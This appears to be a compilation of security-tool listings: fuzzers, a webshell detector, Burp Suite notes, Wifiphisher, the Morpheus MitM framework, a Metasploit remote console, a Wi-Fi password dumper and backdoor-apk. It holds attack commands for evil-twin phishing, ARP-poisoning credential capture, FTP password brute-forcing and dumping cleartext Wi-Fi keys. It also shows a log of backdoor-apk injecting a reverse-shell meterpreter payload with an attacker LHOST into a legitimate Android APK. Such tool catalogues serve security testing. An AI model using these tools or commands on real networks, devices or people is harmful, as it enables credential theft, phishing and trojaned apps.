sudo apt-get install ooniprobe deb.torproject.org-keyring

Note: You'll need to swap out $RELEASE for either yakkety , xenial or trusty . This will not happen automatically. You will also need to ensure that you have the universe repository enabled. The universe repository is enabled by default in a standard Ubuntu installation but may not be on some minimal on not standard installations.

Installation

Mac OS X
You can install ooniprobe on OSX if you have installed homebrew ( http://mxcl.github.io/homebrew ) with:

brew install ooniprobe

Unix systems (with pip)
Make sure you have installed the following dependencies:

build-essential
python (>=2.7)
python-dev
pip
libgeoip-dev
libdumbnet-dev
libpcap-dev
libssl-dev
libffi-dev
tor (>=0.2.5.1 to run all the tor related tests)

Optional dependencies:

obfs4proxy

On debian based systems this can generally be done by running:

sudo apt-get install -y build-essential libdumbnet-dev libpcap-dev libgeoip-dev libffi-dev python-dev python-pip tor libssl-dev obfs4proxy

Then you should be able to install ooniprobe by running:

sudo pip install ooniprobe

or install ooniprobe as a user:

pip install ooniprobe

Using ooniprobe
Net test is a set of measurements to assess what kind of internet censorship is occurring.
Decks are collections of ooniprobe nettests with some associated inputs.
Collector is a service used to report the results of measurements.
Test helper is a service used by a probe for successfully performing its measurements.
Bouncer is a service used to discover the addresses of test helpers and collectors.

Configuring ooniprobe
After successfully installing ooniprobe you should be able to access the web UI on your host machine at http://localhost:8842/ .
You should now be presented with the web UI setup wizard where you can read the risks involved with running ooniprobe. Upon answering the quiz correctly you can enable or disable ooniprobe tests, set how you can connect to the measurement's collector and finally configure your privacy settings.
By default ooniprobe will not include personal identifying information in the test results, nor create a pcap file. This behavior can be personalized.

Run ooniprobe as a service (systemd)
Upon ooniprobe version 2.0.0 there is no need for cronjobs as ooniprobe-agent is responsible for the tasks scheduling.
You can ensure that ooniprobe-agent is always running by installing and enabling the systemd unit ooniprobe.service:

wget https://raw.githubusercontent.com/TheTorProject/ooni-probe/master/scripts/systemd/ooniprobe.service --directory-prefix=/etc/systemd/system
systemctl enable ooniprobe
systemctl start ooniprobe

You should be able to see a similar output if ooniprobe (systemd) service is active and loaded by running systemctl status ooniprobe:

● ooniprobe.service - ooniprobe.service, network interference detection tool
   Loaded: loaded (/etc/systemd/system/ooniprobe.service; enabled)
   Active: active (running) since Thu 2016-10-20 09:17:42 UTC; 16s ago
   Process: 311 ExecStart=/usr/local/bin/ooniprobe-agent start (code=exited, status=0/SUCCESS)
   Main PID: 390 (ooniprobe-agent)
   CGroup: /system.slice/ooniprobe.service
└─390 /usr/bin/python /usr/local/bin/ooniprobe-agent start

Setting capabilities on your virtualenv python binary
If your distribution supports capabilities you can avoid needing to run OONI as root:

setcap cap_net_admin,cap_net_raw+eip /path/to/your/virtualenv's/python2

Reporting bugs
You can report bugs and issues you find with ooni-probe on The Tor Project issue tracker filing them under the "Ooni" component: https://trac.torproject.org/projects/tor/newticket?component=Ooni .
You can either register an account or use the group account "cypherpunks" with password "writecode".

Contributing
You can download the code for ooniprobe from the following git repository:

git clone https://github.com/TheTorProject/ooni-probe.git

You should then submit patches for review as pull requests to this github repository:
https://github.com/TheTorProject/ooni-probe
Read this article to learn how to create a pull request on github ( https://help.github.com/articles/creating-a-pull-request ).
If you prefer not to use github (or don't have an account), you may also submit patches as attachments to tickets.
Be sure to format the patch (given that you are working on a feature branch that is different from master) with:

git format-patch master --stdout > my_first_ooniprobe.patch

Setting up development environment
On Debian based systems a development environment can be setup as follows: (prerequisites include build essentials, python-dev, and tor; for tor see https://www.torproject.org/docs/debian.html.en ):

sudo apt-get install python-pip python-virtualenv virtualenv
sudo apt-get install libgeoip-dev libffi-dev libdumbnet-dev libssl-dev libpcap-dev
git clone https://github.com/TheTorProject/ooni-probe
cd ooni-probe
virtualenv venv

virtualenv venv will create a folder in the current directory which will contain the Python executable files, and a copy of the pip library which you can use to install other packages. To begin using the virtual environment, it needs to be activated:

source venv/bin/activate
pip install -r requirements.txt
pip install -r requirements-dev.txt
python setup.py install
ooniprobe -s  # if all went well, lists available tests

Download OONI

An extremely fast and flexible web fuzzer.

Why another fuzzer?
My main motivation was to write a script that would allow me to fuzz a website based on a dictionary but that allowed me to filter words on that dictionary based on regex patterns. This necessity came from the frustration of trying to find the pages from the partial results returned by the Soroush's IIS shortname scanner tool ( https://github.com/irsdl/iis-shortname-scanner/ ). In case that you're not aware of, most IIS web servers version 7.5 or below are vulnerable to filenames partial name discovery by requesting those pages in the format 8.3, for example: abcdef~1.zip
Many times I had results like getpag~1.asp, where you can clearly see that the page filename must be "get" followed by a word started with "pag". This gets very easily done on Filebuster:

# perl filebuster.pl -u http://yoursite.com/get{fuzz}.asp -w /path/to/wordlist.txt -p ^pag

Initially Filebuster was just this, a fuzzer with regex support but then I really invested some time on it to support various interesting features while keeping it blazing fast.

Why is it so fast?
Filebuster was built based on one of the fastest HTTP classes in the world (of PERL) - Furl::HTTP. Also the thread modelling is a bit optimized to run as fast as possible.

Features
It packs a ton of features like:

The already mentioned Regex patterns
Supports HTTP/HTTPS/SOCKS proxy
Allows for multiple wordlists using wildcards
Additional file extensions
Adjustable timeouts and retries
Adjustable delays / throttling
Hide results based on HTTP code, length or words in headers or body
Support for custom cookies
Support for custom headers
Supports multiple versions of the TLS protocol
Automatic TTY detection
Recursive scans
Integrated wordlists

Requisites
Perl version 5.10 or higher is required
Filebuster resources a lot of features to third party libraries. However they can be easily installed with the following command:

# cpan install YAML Furl Switch Benchmark Cache::LRU Net::DNS::Lite List::MoreUtils IO::Socket::SSL URI::Escape HTML::Entities IO::Socket::Socks::Wrapper

Installation
Filebuster is a Perl script so no installation is necessary. However, the best way of using filebuster is by creating a soft link on a directory that is included in the path. For example:

# ln -s /path/to/filebuster.pl /usr/local/bin/filebuster

Then you will be able to use it system wide

Syntax
On the most basic form, Filebuster can be run using the following syntax:

# perl filebuster.pl -u http://yoursite.com/ -w /path/to/wordlist.txt

If you want to fuzz the final part of the URL, then you don't need to using the tag {fuzz} to indicate where to inject.
A more complex example:

# perl filebuster.pl -u http://yoursite.com/{fuzz}.jsp -w /path/to/wordlist.txt -t 3 -x http://127.0.0.1:8080 --hs "Error"

This would allow you to fuzz a website with 3 threads to find JSP pages, using a local proxy and hiding all responses with "Error" in the body.
For the complete syntax help with examples, just run filebuster.pl --help .

Wordlists
I've created some wordlists based on different sources around the web for your convenience. You can find them on the wordlists directory. This means you can start using FileBuster right away:

# perl filebuster.pl -u http://yoursite.com/ -w wordlists/normal.txt

If you need more wordlists, you should check out the great SecLists repository.

Download FileBuster

FTP Password Recovery is a free command-line tool to find your lost or forgotten FTP password for any FTP server.

It automatically detects if the target FTP server allows any Anonymous (without password) connections. In case your FTP server is running on different port (other than port 21) then you can easily specify the same in the tool along with server IP address.

It uses simple dictionary based password recovery method. By default it includes sample dictionary (password list) file containing common FTP login passwords.However you can find good collection of password dictionaries (also called wordlists) here& here.

For complex passwords, you can use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with this tool.

Features

Free tool to recover the lost or Forgotten FTP password
Remotely recover your password for any FTP server
Option to specify non-standard FTP port
Automatically detects any Anonymous users
Uses siimple & quicker Dictionary Crack method
Includes password dictionary file having common FTP passwords
Copies the recovered FTP password to clipboard
Includes Installer for local Installation & Uninstallation

Installation & Un-installation

FTP Password Recovery comes with Installer to help in local installation & un-installation. This installer has intuitive wizard which guides you through series of steps in completion of installation.

At any point of time, you can uninstall the product using the Uninstaller located at following location (by default)

[Windows 32 bit]

C:\Program Files\SecurityXploded\FTPPasswordRecovery

[Windows 64 bit]

C:\Program Files (x86)\SecurityXploded\FTPPasswordRecovery

How to use?

FTP Password Recovery is console based tool, hence it must be launched from command prompt.

Here is the general usage information

FTPPasswordRecovery.exe -i <ipaddress> -p <port> -u <username> -f <passlist_file>

Example of FTP Password Recovery

// Perform FTP Password Recovery using Password List file
FTPPasswordRecovery.exe -i "192.168.1.1" -p 21 -u "administrator" -f "c:\passlist.txt"

Download FTP Password Recovery

A Python open source toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination, it automates the process of detecting the above.

Purpose

The main purpose of BackdoorMan is to help web-masters and developers to discover malicious scripts in their site files, because it is quite common for hackers to place a back-door on a site they have hacked. A back-door can give the hacker continued access to the site even if the site owners change account passwords. Back-door scripts will vary from 100s of lines of code to 1 or 2 lines of code and can be merged in hundreds of files which makes it very hard to discover it, especially if the back-door is inactive. There is common ways and tools that can be used including grep , but BackdoorMan automates all the above as described earlier and make it even more easier (at least I hope so).

Features

Shells detect by filename using shells signature database.
Recognition of web back-doors.
Detect the use of suspicious PHP functions and activities.
Use of external services beside its functionalities.
Use of nimbusec shellray API (free online webshell detect for PHP files https://shellray.com ).
- Very high recognition performance for webshells.
- Check suspicious PHP files online.
- Easy, fast and reliable.
- Classification for webshells with behavior classification.
- Free service of nimbusec.
Use of VirusTotal Public API (free online service that analyzes files and facilitates the quick detection of viruses, worms, trojans and all kinds of malware), it can be useful in our situation.
Use of UnPHP (The online PHP decoder: UnPHP is a free service for analyzing obfuscated and malicious PHP code) www.unphp.net . Very useful in our situation.
- Eval + gzinflate + Base64.
- Recursive De-Obfuscating.
- Custom Function and Regex Support.

Requirements

requests module

Version
v2.3.1

Author
Yassine Addi

Usage

Usage: BackdoorMan [options] destination1 [destination2 ...]

A toolkit that helps you find malicious, hidden and suspicious PHP scripts and shells in a chosen destination.
Author: Yassine Addi <yassineaddi.dev(at)gmail(dot)com>.
NOTE: This tool does not require Internet connection but it is highly recommended to benefit from all features.

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -o OUTPUT, --output=OUTPUT
                        save output in a file
  --no-color            do not use colors in the output
  --no-info             do not show file information
  --no-apis             do not use APIs during scan (not recommended)

Changelog

v1.0.0    - 1st release <https://github.com/yassineaddi/PHP-backdoor-detector>.
v2.0.0    - rename software to `BackdoorMan`.
          - improve external services (APIs).
          - separate databases from main script.
          - lot of improvements (compare with 1st release).
v2.1.0    - separate script to classes to optimize the software.
v2.2.0    - add `Servicer` class.
          - rename classes.
          - add `--no-color` option.
          - add `--no-external-services` option.
          - add `--no-file-info` option.
          - improve `Reporter` class.
          - improve software interface.
          - small improvements.
          - remove single-line and multi-line comments before scanning.
          - add `--force` option.
          - add UnPHP API.
          - improve `activities.txt` database.
v2.2.1    - modify comments.
v2.3.1    - use of custom parser instead of reg-ex to detect backticks (execution operator)
            due to false positives.
          - improved report class.
          - separate functions and activities to low, medium and high...
          - rename options.
          - add `-o, --output` option.
          - add/modify comments.

Download BackdoorMan

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes v1.7.14

This release fixes the following security issues that were identified through our bug bounty program. Note that all of these issues involve the Burp user actively testing a malicious website that has been designed specifically to attack Burp Suite.

If a user visits a malicious website in their browser, and in Burp selects a crafted request that was generated by that website, and uses either the "Request in browser" function or the "Generate CSRF Poc" and "Test in browser" function, then the malicious website can XSS an arbitrary website.
If a user scans a malicious website and another website within the same Burp project, and exports all of the scan results as a single HTML report, and views that report in a browser, then the malicious website can capture the scan results for the other site.
If a user scans a malicious website and another website within the same Burp project, then the malicious website might be able to capture the raw data of any Burp Collaborator interactions that were performed by the other website.

We are pleased that our bug bounty program has alerted us to these issues within Burp. As well as fixing known issues at source, we have taken a defense-in-depth approach to hardening Burp in response to them, including:

Some functions within Burp's in-browser interface that increased its attack surface have been removed altogether, including the Proxy history, the buttons to repeat requests and view responses, and support for the plug-n-hack Firefox extension.
Scan issue descriptions, including those generated by Burp extensions, are now subject to an HTML whitelist that allows only formatting tags and simple hyperlinks.
HTML scan reports now include a Content Security Policy directive that prevents execution of scripts in modern browsers.

Note: The security issues identified have all been fixed within Burp Suite. As a defense-in-depth measure, some hardening has also been performed of Burp Collaborator. It is recommended that users who have deployed a private Burp Collaborator server should update to the current version in a timely way.

A number of other enhancements were made, including:

A number of improvements to existing Scanner checks to improve accuracy.
When a request is sent to Repeater but never issued, the request is now stored in the Burp project file, so the initial unrequested item will reappear when the project is reopened.
The Proxy listener now accepts SSL negotiations from browsers that are hardened only to support selected protocols and ciphers.

Download Burp Suite Professional 1.7.14

PyJFuzz is a small, extensible and ready-to-use framework used to fuzz JSON inputs , such as mobile endpoint REST API, JSON implementation, Browsers, cli executable and much more.

Version	1.1.0
Homepage	http://www.mseclab.com/
Github	https://github.com/mseclab/PyJFuzz
Author	Daniele Linguaglossa ( @dzonerzy )
License	MIT - (see LICENSE file)

Installation
Dependencies
In order to work PyJFuzz need a single dependency, bottle , you can install it from automatic setup.py installation.
Installation
You can install PyJFuzz with the following command

git clone https://github.com/mseclab/PyJFuzz.git && cd PyJFuzz && sudo python setup.py install

Documentation and Examples
CLI tool
Once installed PyJFuzz will create both a python library and a command-line utility called pjf (screenshot below)

Library
PyJFuzz could also work as a library, you can import in your project like following

from pyjfuzz.lib import *

Classes
The available object/class are the following:

PJFServer - User to start and stop built-in HTTP and HTTPS servers
PJFProcessMonitor - Used to monitor process crash, it will automatically restart proccess each time it crash
PJFTestcaseServer - The testcase server is used in conjunction with PJFProcessMonitor, whenever a process crash the testcase server will register and store the JSON which cause the crash
PJFFactory - It's the main object used to do the real fuzz of JSON objects
PJFConfiguration - It's the configuration file for each of the available objects
PJFExternalFuzzer - Used by PJFactory is a auxiliary class which provide an interface to other command line fuzzer such as radamsa
PJFMutation - Used by PJFFactory provide all the mutation used during fuzzing session
PJFExecutor - Provides an interface to interact with external process

Examples
Below some trivial example of how-to implement PyJFuzz powered program
simple_fuzzer.py

from argparse import Namespace
from pyjfuzz.lib import *

config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6))
fuzzer = PJFFactory(config)
while True:
    print fuzzer.fuzzed

simple_server.py

from argparse import Namespace
from pyjfuzz.lib import *

config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, debug=True, indent=True))
PJFServer(config).run()

Sometimes you may need to modify standard non customizable settings such as HTTPS or HTTP server port, this can be done in the following way

from argparse import Namespace
from pyjfuzz.lib import *

config = PJFConfiguration(Namespace(json={"test": ["1", 2, True]}, nologo=True, level=6, indent=True))
print config.ports["servers"]["HTTP_PORT"]   # 8080
print config.ports["servers"]["HTTPS_PORT"]  # 8443
print config.ports["servers"]["TCASE_PORT"]  # 8888
config.ports["servers"]["HTTPS_PORT"] = 443  # Change HTTPS port to 443

Remember : When changing default ports, you should always handle exception due to needed privileges!
Below a comprehensive list of all available settings / customization of PJFConfiguration object:
Configuration table

Name	Type	Description
json	dict	JSON object to fuzz
json_file	str	Path to a JSON file
parameters	list <str>	List of parameters to fuzz (taken from JSON object)
techniques	list <int>	List of polyglot attack, used to generate fuzzed JSON, such as XSS, LFI etc. They are in the range 0-13 (Look techniques table )
level	int	Fuzzing level in the range 0-6
utf8	bool	If true switch from unicode encode to pure byte representation
indent	bool	Set whenever to indent the result object
url_encode	bool	Set whenever to URLEncode the result object
strong_fuzz	bool	Set whenever to use strong fuzzing (strong fuzzing will not maintain JSON structure, usefull for parser fuzzing)
debug	bool	Set whenever to enable debug prints
exclude	bool	Exclude from fuzzing parameters selected by parameters option
notify	bool	Set whenever to notify process monitor when a crash occurs only used with PJFServer
html	str	Path to an HTML directory to serve within PJFServer
ext_fuzz	bool	Set whenever to use binary from "command" as an externale fuzzer
cmd_fuzz	bool	Set whenever to use binary from "command" as fuzzer target
content_type	str	Set the content type result of PJFServer (default application/json )
command	list <str>	Command to execute each paramester is a list element, you could use shlex.split from python

Techniques table

Index	Description
0	XSS injection (Polyglot)
1	SQL injection (Polyglot)
2	LFI attack
3	SQL injection polyglot (2)
4	XSS injection (Polyglot) (2)
5	RCE injection (Polyglot)
6	LFI attack (2)
7	Data URI attack
8	LFI and HREF attack
9	Header injection
10	RCE injection (Polyglot) (2)
11	Generic templace injection
12	Flask template injection
13	Random character attack

Screenshots
Below some screenshot just to let you know what you should expect from PyJFuzz

Built-in tool
PyJFuzz is shipped with a built-in tool called PyJFuzz Web Fuzzer , this tool will provide an automatic fuzzing console via HTTP and HTTPS server, it can be used to easly fuzz almost any web browser even when you can't control the process state!
There are two switch used to launch this tool (--browser-auto and --fuzz-web), the first one perform automatic browser restart when a crash occur, the other one try to catch when a browser doesn't make requests anymore. Both of them always save the testcases, below some screenshots.

End
Thanks for using PyJFuzz!
Happy Fuzzing from mseclab

Download PyJFuzz

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malwares. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Wifiphisher works on Kali Linux and is licensed under the GPL license.

How it works

After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim's perspective, the attack makes use in three phases:

Victim is being deauthenticated from her access point . Wifiphisher continuously jams all of the target access point's wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations.
Victim joins a rogue access point . Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed.
Victim is being served a realistic specially-customized phishing page . Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malwares. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.

Performing MiTM attack

Requirements
Following are the requirements for getting the most out of Wifiphisher:

Kali Linux. Although people have made Wifiphisher work on other distros, Kali Linux is the officially supported distribution, thus all new features are primarily tested on this platform.
One wireless network adapter that supports AP mode. Drivers should support netlink.
One wireless network adapter that supports Monitor mode and is capable of injection. Again, drivers should support netlink. If a second wireless network adapter is not available, you may run the tool with the --nojamming option. This will turn off the de-authentication attack though.

Installation
To install the latest development version type the following commands:

git clone https://github.com/sophron/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies (Currently, hostapd, PyRIC, jinja2)

Alternatively, you can download the latest stable version from the Releases page .

Usage
Run the tool by typing wifiphisher or python bin/wifiphisher (from inside the tool's directory).
By running the tool without any options, it will find the right interfaces and interactively ask the user to pick the ESSID of the target network (out of a list with all the ESSIDs in the around area) as well as a phishing scenario to perform.

wifiphisher -aI wlan0 -jI wlan4 -p firmware-upgrade

Use wlan0 for spawning the rogue Access Point and wlan4 for DoS attacks. Select the target network manually from the list and perform the "Firmware Upgrade" scenario.
Useful for manually selecting the wireless adapters. The "Firware Upgrade" scenario is an easy way for obtaining the PSK from a password-protected network.

wifiphisher --essid CONFERENCE_WIFI -p plugin_update -pK s3cr3tp4ssw0rd

Automatically pick the right interfaces. Target the Wi-Fi with ESSID "CONFERENCE_WIFI" and perform the "Plugin Update" scenario. The Evil Twin will be password-protected with PSK "s3cr3tp4ssw0rd".
Useful against networks with disclosed PSKs (e.g. in conferences). The "Plugin Update" scenario provides an easy way for getting the victims to download malicious executables (e.g. malwares containing a reverse shell payload).

wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login

Do not target any network. Simply spawn an open Wi-Fi network with ESSID "FREE WI-FI" and perform the "OAuth Login" scenario.
Useful against victims in public areas. The "OAuth Login" scenario provides a simple way for capturing credentials from social networks, like Facebook.
Following are all the options along with their descriptions (also available with wifiphisher -h ):

Short form	Long form	Explanation
-h	--help	show this help message and exit
-s SKIP	--skip SKIP	Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA
-jI JAMMINGINTERFACE	--jamminginterface JAMMINGINTERFACE	Manually choose an interface that supports monitor mode for deauthenticating the victims. Example: -jI wlan1
-aI APINTERFACE	--apinterface APINTERFACE	Manually choose an interface that supports AP mode for spawning an AP. Example: -aI wlan0
-t TIMEINTERVAL	--timeinterval TIMEINTERVAL	Choose the time interval between DEAUTH packets being sent
-dP DEAUTHPACKETS	--deauthpackets DEAUTHPACKETS	Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -dP 2
-d	--directedonly	Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs
-nJ	--nojamming	Skip the deauthentication phase. When this option is used, only one wireless interface is required
-e ESSID	--essid ESSID	Enter the ESSID of the rogue Access Point. This option will skip Access Point selection phase. Example: --essid 'Free WiFi'
-p PHISHINGSCENARIO	--phishingscenario PHISHINGSCENARIO	Choose the phishing scenario to run.This option will skip the scenario selection phase. Example: -p firmware_upgrade
-pK PRESHAREDKEY	--presharedkey PRESHAREDKEY	Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd

Screenshots

Targeting an access point

A successful attack

Fake router configuration page

Fake OAuth Login Page

Fake web-based network manager

Disclaimer

Authors do not own the logos under the wifiphisher/data/ directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research.
Usage of Wifiphisher for attacking infrastructures without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

Download WiFiPhisher

Morpheus framework automates tcp/udp packet manipulation tasks by using etter filters to manipulate target requests/responses under MitM attacks replacing the tcp/udp packet contents by our contents befor forward the packet back to the target host...

workflow:

1º - attacker -> arp poison local lan (mitm)

2º - target -> requests webpage from network (wan)

3º - attacker -> modifies webpage response (contents)

4º - attacker -> modified packet its forward back to target host

morpheus ships with some pre-configurated filters but it will allow users to improve them when lunching the attack (morpheus scripting console). In the end of the attack morpheus will revert the filter back to is default stage, this will allow users to improve filters at running time without the fear of messing with filter command syntax and spoil the filter.

"Perfect for scripting fans to safely test new concepts"...

What can we acomplish by using filters?

morpheus ships with a collection of etter filters writen be me to acomplish various tasks: replacing images in webpages, replace text in webpages, inject payloads using html <form> tag, denial-of-service attacks (drop,kill packets from source), https/ssh downgrade attacks, redirect target browser traffic to another domain and gives you the ability to build compile your filter from scratch and lunch it through morpheus framework (option W).

"filters can be extended using browser languages like: javascript,css,flash,etc"...

In this example we are using " HTML tag" to inject an rediretion url in target request In this example we are using 'CSS3' to trigger webpage 180º rotation

Framework limitations

1º - morpheus will fail if target system its protected againt arp poison atacks
2º - downgrade attacks will fail if browser target as installed only-https addon's
3º - target system sometimes needs to clear netcache for arp poison to be effective
4º - many attacks described in morpheus may be droped by target HSTS detection sys.

5º - incorrect number of token (///) in TARGET !!

morpheus by default will run ettercap using IPv6 (USE_IPV6=ACTIVE) like its previous
configurated into the 'settings' file, if you are reciving this error edit settings
file befor runing morpheus and set (USE_IPV6=DISABLED) to force ettercap to use IPV4

6º - morpheus needs ettercap to be executed with higth privileges (uid 0 | gid 0).
correct ettercap configuration display (running as Admin without ssl disectors active)

By default morpheus (at startup) will replace the original etter.conf/etter.dns files provided by ettercap, at framework exit morpheus will revert files to is original state..

Dependencies

ettercap, nmap, apache2, zenity

Framework option 1 [firewall] screenshots

firewall [option 1] pre-configurated filter will capture credentials from the follow services:
http,ftp,ssh,telnet (facebook uses https/ssl :( ) report suspicious connections, report common
websocial browsing (facebook,twitter,youtube), report the existence of botnet connections like:
Mocbot IRC Bot, Darkcomet, redirect browser traffic and allow users to block connections (drop,kill) 
"Remmenber: morpheus gives is users the ability to 'add more rules' to filters befor execution"

[morpheus] host:192.168.1.67   [ -> ]  port:23 telnet  ☆
           Source ip addr      flow    destination     rank good

[morpheus] host:192.168.1.67   [ <- ]  port:23 telnet  ☠
           Destination ip      flow    source port     rank suspicious

Basically firewall filter will act like one offensive and defensive tool analyzing the
tcp/udp data flow to report logins,suspicious traffic,brute-force,block target ip,etc.

Download morpheus

A remote msfconsole written in Python 2.7 to connect to the msfrcpd server of metasploit. This tool gives you the ability to load modules permanently as daemon on your server like autopwn2. Although it gives you the ability to remotely use the msfrpcd server it is recommended to use it locally with a ssh or mosh shell because certificate validation is not enabled.

Features

Optimized delivery & execution of commands.
Has all msf commands implemented even future ones. This is possible through the structure of the rpc api.
Browse through your command history with the up and down arrow key.
Tab completion for system paths.
It feels like the normal msfconsole!

How does it look like ?

[*] Connecting to server:
 Host => myDomain.com,
 Port => 55553,
 User => msf,
 Pwd => ***,
 SSL => True

[+] Successfully connected
[*] Console id: 19
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.12.22-dev-52b81f3                 ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf >

How do I use it ?
Usage: Main.py [options]

Options:
  -h, --help            show this help message and exit
  -r RESOURCE, --resource=RESOURCE
                        Path to resource file
  -u USERNAME, --user=USERNAME
                        Username specified on msfrpcd
  -p PASSWORD, --pass=PASSWORD
                        Password specified on msfrpcd
  -s, --ssl             Enable ssl
  -P PORT, --port=PORT  Port to connect to
  -H HOST, --host=HOST  Server ip
  -c, --credentials     Use hardcoded credentials
  -e, --exit            Exit after executing resource script

With the -c option you can use the credentials hardcoded into Main.py feel free to change them so that you don't have to use the credential parameters all the time.
With the -r option you specify a resource script to load from your computer into the console.

Example:
This will load a resource script and use the hardcoded credentials:

python Main.py -c -r /root/resource/handler/allHandlers.rc

This will log in to the msfrpcd server through command line arguments:

python Main.py --ssl --port 55553 --host 127.0.0.1 --user msf --pass msf

How do I install it ?
First you must have metasploit installed. If you cant use the installer because you have no graphical environment or whatever use this guide from rapid7: Setting Up a Metasploit Development Environment This will install all needed dependencies:

git clone https://github.com/allfro/pymetasploit.git pymetasploit
cd pymetasploit && sudo python setup.py install

Also don't forget to start your msfrpcd server:

cd metasploit-framework/
ruby msfrpcd -U msf -P msf -p 55553

And its probably a good idea to start and connect to the postgresql database: By the way change the password in the echo line.

sudo update-rc.d postgresql enable
sudo service postgresql start
echo "create database msf;create user msf with password 'password';grant all privileges on database msf to msf;" > createdb_sql.txt
sudo -u postgres /usr/bin/psql < /home/postgres/createdb_sql.txt

In Metasploit:

db_connect msf:password@127.0.0.1/msf

Download MSF-Remote-Console

This is an open source tool to dump the wifi profiles and cleartext passwords of the connected access points on the Windows machine. This tool will help you in a Wifi testing. Furthermore, it is useful while performing red team or an internal infrastructure engagements.

Features

Option 1: Shows the wireless networks available to the system. If interface name is given, only the networks on the given interface will be listed. Otherwise, all networks visible to the system will be listed.
Option 2: Shows a list of wireless profiles configured on the system.
Option 3: Shows the allowed and blocked wireless network list.
Option 4: Shows a list of all the wireless LAN interfaces on the system.
Option 5: Generates a detailed report about each wireless access point profile on the system. Group Policy Profiles are read only. User Profiles are readable and writeable, and the preference order can be changed.
Option 6: Dumps the cleartext passwords of every wireless profiles on the system. Make sure to generate the profile file (by selecting option 2) before running this option. Always run this as an administrator user to see the cleartext password. User needs to provide individual wireless name by reading the profile names(option 7).
Option 7: It opens the list of wireless profiles on the system using notepad.
Option 8: It saves WLAN profiles to XML files.
Option 9: Exit gracefully.

General Notes

[+] Each option in the tool generates the ".txt" file as an output.

[+] If you run the tool multiple times, the output gets appended to the previous results.

How to run the application?

[+] Run cmd.exe as an administrator.

[+] Change Directory

[+] Run the application as C:\>python wifi_dumper.py

Questions?

Twitter: https://twitter.com/maniarviral

LinkedIn: https://au.linkedin.com/in/viralmaniar

Download Wifi-Dumper

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Usage:

root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.1.7 on Wed Nov 30 22:30:34 EST 2016
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
